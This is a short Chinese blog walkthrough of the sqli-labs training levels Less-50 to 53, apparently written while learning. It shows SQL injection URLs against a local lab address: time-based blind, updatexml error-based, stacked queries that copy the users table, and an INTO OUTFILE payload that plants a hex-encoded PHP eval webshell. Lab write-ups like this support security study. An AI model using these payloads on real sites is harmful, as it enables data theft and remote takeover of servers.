Less50-Less53

Posted 2021-03-11 7-58

Less50:  无包裹

与第46关不同的是 使用了mysqli_multi_query函数

 mysqli_multi_query() 函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。

 所以我们可以用堆叠注入的方法

 

 

 

五种方法：

• 1.基于时间的盲注
• 2.基于报错注入
• 3.写一句话木马
• 4.使用迭代注入创建删除一个表

1.基于时间的盲注

http://192.168.27.156/sqli-labs/Less-50/?sort=1 and if(length(database()>1),1,sleep(5)) --+

 

 

 

2.基于报错注入

http://192.168.27.156/sqli-labs/Less-50/?sort=1 and updatexml(1,concat(0x7e,(database())),1)--+

 

 

 

3.写一句话木马

http://192.168.27.156/sqli-labs/Less-50/?sort=3 into outfile "C:phpStudyWWWc.php" lines terminated by 0x3c3f70687020406576616c28245f504f53545b27677879275d293b203f3e  --+

 

 

 

 

 

 

4.使用迭代注入创建删除一个表

http://192.168.27.156/sqli-labs/Less-50/?sort=3;create table gxy50 like users;insert into gxy50 select * from users;--+

 

 

 

 

 

 

 

 

 

 

Less-51:  使用’’包裹方法与第50关一致

 

 

 

 

Less-52:  无包裹不回显错误  不能使用报错注入方法与第50关一致

 

 

 

 

 

 

 

Less-53:使用’’包裹不回显错误  不能使用报错注入方法与第50关一致